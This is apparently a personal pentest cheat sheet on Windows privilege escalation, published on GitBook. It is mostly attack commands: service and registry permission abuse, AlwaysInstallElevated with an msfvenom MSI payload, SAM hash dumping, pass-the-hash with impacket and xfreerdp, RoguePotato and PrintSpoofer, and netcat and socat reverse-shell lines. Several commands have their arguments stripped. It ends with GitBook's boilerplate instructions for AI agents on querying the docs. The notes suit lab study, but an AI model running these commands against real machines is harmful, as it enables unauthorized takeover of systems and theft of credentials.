> For the complete documentation index, see [llms.txt](https://ressurect.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ressurect.gitbook.io/notes/cheatsheet/privilege-escalation/windows.md). # Windows **- Registry**\ HKLM is for all users, HKCU is for the current user.\ \ \&#xNAN;**- Check security groups of current user** ``` whoami /Groups net user ``` **1. Insecure Service Permissions** ``` C:\PrivEsc\accesschk.exe /accepteula -uwcqv user sc qc # Elevated Privileges as ‘SERVICE_START_NAME : LocalSystem’ sc config binpath="" sc start ``` \ **2. Unquoted Service Path** ``` sc qc unquotedsvc accesschk.exe -d “C:\Program Files\Unquoted Path Service\” copy reverse.exe “C:\Program Files\Unquoted Path Service\Common” sc start unquotedsvc ``` \ **3. Weak Registry Permissions**\ \ NT AUTHORITY\INTERACTIVE = All logged-in users\ \ REG\_EXPAND\_SZ : An expandable data string.\ \ REG\_SZ : This data type has a fixed length. ``` sc qc regsvc accesschk.exe -k accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc reg add /v ImagePath /t REG_EXPAND_SZ /d ``` \ **4. Insecure Service Executables** ``` sc qc accesschk.exe # output - RW Everyone # Replace the service executable with reverse shell generated ``` \ **5. Registry Autoruns**\ \[Todo] **6. Registry AlwaysInstallElevated**\ set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys:\ `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`\ `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer` ``` # Check the keys reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer # Payload generation msfvenom -f msi msiexec /quiet /qn /i C:\PrivEsc\reverse.msi # [/i - install ] ``` \ **7. Passwords in Registry** ``` reg query HKLM /f password /s # Adding autologon password reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /d testing123 /t REG_SZ # DefaultUsername and DefaultPassword in autologin # HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon # Query registry value [?] Get-ChildItem -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\' ``` \ **8. Retrieve password from SAM SYSTEM registry hives**\ \- SAM registry is not accessible\ `reg query HKLM\SAM\SAM`\ ERROR: Access is denied. ``` python3 creddump7/pwdump.py SYSTEM SAM # Crack NTLM hash ``` \ **9. If creds are saved from a previous user \[run exe from a folder which belongs to the admin/higher privilege user]** ``` # list saved creds cmdkey /list # run an executable with priv's on another user runas /savecred /user:<> ``` \ **10. Pass the Hash (pth)** ``` # pth using impacket via SMB [pth-winexe works on SMB] psexec.py admin@10.10.92.1 -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da # xfreerdp with pth (pass-the-hash) [NT component only in LM:NT if no password for LM] xfreerdp +clipboard /u:admin /pth:a9fdfa038c4b75ebc76dc855dd74f0da /cert:ignore /v:10.10.92.1 ``` \ **11. Task running every few intervals**\ Append “path-to-exec” at the end of PowerShell script\ \ **12. Insecure GUI Apps**\ file > open > navigation pane > C:\Windows\System32\cmd.exe\ \ **13. Startup Apps \[createshortcut.vbs]**\ Adding shortcut to reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"\ \ **14. RoguePotato Attack** {% embed url="" %} • You need a compromised account on the victim machine with Impersonate privileges\ s0- whomai /priv \[SeImpersonatePrivilege is Enabled]\ s1- sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:\:9999\ s2- nc -nlvp \\ s3 - when running as “nt authority\local service”\ RoguePotato.exe -r \ -e "\" -l 9999\ \ \- run as a local service "nt authority\local service"\ C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe"\ -or-\ C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"\ \ **15. PrintSpoofer**\ PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i\ \ \&#xNAN;**- Tools**\ winpeasany.exe\ seatbelt.exe all full\ sharp.exe audit\ JAWS \[works in the presence of AV solutions] \ \&#xNAN;**- Powerup** ``` Import-Module powerup.ps1 Invoke-AllChecks Get-ServiceUnquoted ``` \ \&#xNAN;**- List of Exploitable Privileges** {% embed url="" %} **- SeImpersonate** ``` # PrintSpoofer32.exe [requires an executable file. Hence, PowerShell scripts don't work] .\PrintSpoofer32.exe -c 'nc.exe -e cmd' ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ressurect.gitbook.io/notes/cheatsheet/privilege-escalation/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.